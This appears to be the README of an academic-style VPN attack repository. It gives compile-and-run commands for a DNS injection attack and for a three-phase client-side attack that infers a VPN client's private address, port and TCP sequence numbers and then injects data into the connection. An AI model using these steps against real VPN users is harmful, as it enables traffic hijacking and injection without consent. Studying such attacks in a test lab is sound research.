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# VeepExploit
The current version of VPN attack code
##### Attack Machine Environment
* C++
* libtins (http://libtins.github.io/download/)
## Server-side attack
#### Requirements
* VPN client connected to a VPN server
* Attack machine sitting somewhere in between VPN server and client forwarding all traffic between the two
***Note:*** Full virtual test environment setup for the server-side attack is detailed in the README within the `virt-lab` folder
#### Running the DNS Attack Script
1. Change to udp-dns attack folder - `cd other-end-attack/dnuss/full_scan`
2. Compile attack script - `make`
3. Check to make sure vpn server has a conntrack entry for some vpn client's dns lookup (on vpn-server vm): `sudo conntrack -L | grep udp`
3. Try to inject from attack router - `sudo ./uud_send <dns_server_ip> <src_port (53)> <vpn_server_ip> <start_port> <end_port>`
## Client-side attack
#### Requirements
* VPN client connected to a VPN server
* Reverse path filtering disabled on the VPN client machine
* Attack router acting as the local network gateway for the victim (VPN client) machine
#### Running the Full Attack Script
* Rebuild all the attack scripts: `./rebuild_all.sh`
* `cd full_attack`
* Change `attack.sh` vars to appropriate values
* `sh attack.sh <remote_ip>`
***Note:*** `remote_ip` specifies the IP address of the HTTP site.
#### Testing Indivual attack phases
##### Phase 1 - Infer victim's private address
* `cd first_phase`
* `python3 send.py <victim_public_ip> <private_ip_range>`
***Note:*** `private_ip_range` specifies a `/24` network such as `10.7.7.0`.
##### Phase 2 - Infer the port being used to talk to some remote address
* `cd sec_phase`
* Edit `send.cpp` to use the correct MAC addresses
* `g++ send.cpp -o send -ltins`
* `./send <remote_ip> <remote_port> <victim_wlan_ip> <victim_priv_ip>`
***Note:*** `<remote_ip>` is the address we wanna check if the client is connected to and the `<remote_port>` is almost always 80 or 443. The `<victim_wlan_ip>` is the public address of the victim and `<victim_priv_ip>` was found in phase 1. If the scripts not sniffing any challenge acks, then edit the `send.cpp` file to uncomment the `cout` line that prints out the remainder to check if the size of the encrypted packets has slightly changed on this system.
##### Phase 3 - Infer exact sequence number and in-window ack
* `cd third_phase`
* Edit `send.cpp` to use the correct MAC addresses
* `g++ send.cpp -o send -ltins`
* `./send <remote_ip> <remote_port> <victim_wlan_ip> <victim_priv_ip> <victim_port>`
***Note:*** `<victim_port>` was found in phase 2. This script currently just injects a hardcoded string into the TCP connnection but could be easily modified.